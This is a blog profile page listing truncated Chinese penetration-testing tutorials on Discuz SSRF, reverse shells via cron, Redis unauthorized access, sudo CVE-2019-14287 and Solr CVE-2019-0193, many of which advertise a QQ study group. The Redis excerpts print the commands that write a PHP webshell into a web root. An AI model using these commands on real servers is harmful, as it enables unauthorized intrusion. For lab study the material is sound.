自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(13)
  • 收藏
  • 关注

原创 Discuz-3.1 ssrf漏洞利用操作

773617250渗透学习交流群,群内定期发布课程直播内容、时间及地址,欢迎大家进群学习!感谢大家的支持!#001 环境搭建: Phpstudy+win7搭建discuz漏洞环境 把Discuz-3.1 源码拖到网站根目录,然后访问upload目录进行安装,根据提示即可 安装完成访问一波:#002 漏洞复现: Centos7,临时关闭防火墙 开启nc监听6666端口:n...

2019-12-31 10:19:36 931

原创 Redis未授权访问漏洞的利用

 利用redis写webshell 在redis-cli中写入以下命令:config set dir /var/www/html/config set dbfilename redis.phpset webshell “<?php phpinfo(); ?>”save 然后看一下目录下是否生成了一个redis.php的文件 可以看到生成了,查看一下文件的内容...

2019-12-30 10:51:05 97

原创 linux sudo root 权限绕过漏洞(CVE-2019-14287)复现

WEB渗透学习交流群:773617250群内定期通知直播课程、时间及地址,欢迎大家进群学习交流!一. 漏洞描述2019年10月14日,Sudo官方发布了Sudo 1.8.28版本,其中包含sudo root权限绕过漏洞的补丁修复。此漏洞编号是CVE-2019-14287,当sudo配置为允许用户以任意方式运行命令时用户通过Runas规范中的ALL关键字,可以通过指定用户ID -1或4294...

2019-12-28 10:44:59 245

原创 Discuz-ssrf利用计划任务反弹shell

渗透学习交流群773617250,群内定期通知课程内容、课程时间及直播地址,欢迎大家进群学习交流!001 环境搭建: Centos7(安装有apache,php,mysql,redis) 利用winscp把discuz的源码拖到var/www/html目录下: chmod -R 777 upload/ 改一下权限 然后访问192.168.136.133/upload进行安装,但是...

2019-12-27 13:31:45 233

原创 利用redis写webshell

在redis-cli中写入以下命令:config set dir /var/www/html/config set dbfilename redis.phpset webshell “<?php phpinfo(); ?>”save然后看一下目录下是否生成了一个redis.php的文件可以看到生成了,查看一下文件的内容在浏览器中访问一下这个文件,成功解析,内容改成一...

2019-12-26 10:58:30 1506

原创 Redis未授权访问漏洞的利用

渗透学习交流群:群内定期通知课程直播时间及地址,欢迎大家进群学习交流! 利用redis写webshell 在redis-cli中写入以下命令:config set dir /var/www/html/config set dbfilename redis.phpset webshell “<?php phpinfo(); ?>”save 然后看一下目录下是否生成了一...

2019-12-26 10:49:04 174 1

原创 第十八章——内网渗透之域渗透

渗透学习交流群:773617250进群可免费领取学习工具,群内定期通知直播时间!欢迎大家进群学习交流!感谢大家的支持!MSF在讲域渗透之前,先给大家讲讲MSF●kali代理配置http://pawelli.com/archives/527●回顾msf知识●针对内网 批量扫描 ms17-010●针对域成员 08R2 msf渗透 并提权要点:针对对方是x64的架构 生成一个x64的...

2019-12-24 10:32:25 338

原创 Discuz-ssrf利用计划任务反弹shell

渗透学习交流群:773617250进群免费领取学习教程,群内定期通知直播时间,直播时间可与老师互动,欢迎大家进群学习!#001 环境搭建: Centos7(安装有apache,php,mysql,redis) 利用winscp把discuz的源码拖到var/www/html目录下: chmod -R 777 upload/ 改一下权限 然后访问192.168.136.133/up...

2019-12-23 11:08:17 163

原创 第十八章——内网渗透之域渗透

773617250渗透学习交流群,进群可领取一套完整学习工具,群内定期通知参加直播课程,直播时间可与老师进行互动。感谢大家的支持!MSF在讲域渗透之前,先给大家讲讲MSF●kali代理配置http://pawelli.com/archives/527●回顾msf知识●针对内网 批量扫描 ms17-010●针对域成员 08R2 msf渗透 并提权要点:针对对方是x64的架构 生成...

2019-12-21 12:04:58 489

原创 Discuz-3.1 ssrf漏洞利用操作

渗透学习交流群:773617250,进群即可领取一套完整的学习工具,群内定期直播,可与老师互动,欢迎大家进群学习交流!感谢大家的支持!#001 环境搭建: Phpstudy+win7搭建discuz漏洞环境 把Discuz-3.1 源码拖到网站根目录,然后访问upload目录进行安装,根据提示即可 安装完成访问一波:#002 漏洞复现: Centos7,临时关闭防火墙 ...

2019-12-20 10:56:45 549

原创 Apache Solr远程代码执行漏洞 (CVE-2019-0193)复现操作

渗透学习交流群:773617250,进群免费领取课程,群定定期直播,可与讲师进行互动。一. 漏洞描述2019年11月16日,Apache官方发布Apache Solr远程代码执行漏洞(CVE-2019-0193)安全通告,此漏洞存在于可选模块DataImportHandler 中,DataImportHandler是用于从数据库或其他源提取数据的常用模块,该模块中所有DIH配置都可以通过外部请...

2019-12-17 10:50:49 164

原创 Redis未授权访问漏洞的利用

渗透学习交流群:773617250,群内定期直播,发布相关教程,欢迎咨询群主学习交流! 利用redis写webshell 在redis-cli中写入以下命令:config set dir /var/www/html/config set dbfilename redis.phpset webshell “<?php phpinfo(); ?>”save 然后看一下...

2019-12-16 10:29:23 203

原创 linux sudo root 权限绕过漏洞(CVE-2019-14287)复现

渗透学习交流群:773617250(群内定期发布相关教程视频,直播)一. 漏洞描述2019年10月14日,Sudo官方发布了Sudo 1.8.28版本,其中包含sudo root权限绕过漏洞的补丁修复。此漏洞编号是CVE-2019-14287,当sudo配置为允许用户以任意方式运行命令时用户通过Runas规范中的ALL关键字,可以通过指定用户ID -1或4294967295以root用户身份...

2019-12-13 10:28:13 176

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除